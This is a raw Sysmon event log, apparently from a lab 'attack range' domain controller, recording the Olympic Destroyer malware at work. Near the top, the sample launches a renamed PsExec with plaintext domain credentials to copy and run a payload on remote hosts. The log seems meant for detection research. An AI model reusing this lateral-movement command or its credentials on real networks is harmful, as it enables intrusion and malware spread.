10:57:34.979{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-131E-6216-5306-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.981{C8EA50B7-131E-6216-5306-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.979{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-131E-6216-5306-000000003802}6156C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.733{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCFC3AD651CE7312DA2D34075BE0A81C,SHA256=000FDF00E018B5401B62E57C9EDB7F16F7295BC6F1734FE7B9C496904B7686E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.730{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69B5DD935F2439FAA2619722E0D701AA,SHA256=2D2858D143BB1BC49BC85225C1DEEF05C516433F702ABA02EBA912589AC9CD2B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.566{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53769-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000217818Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:32.538{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51420-false10.0.1.12-8000- 10341000x8000000000000000293195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.231{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.231{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.231{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.231{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.231{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.230{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 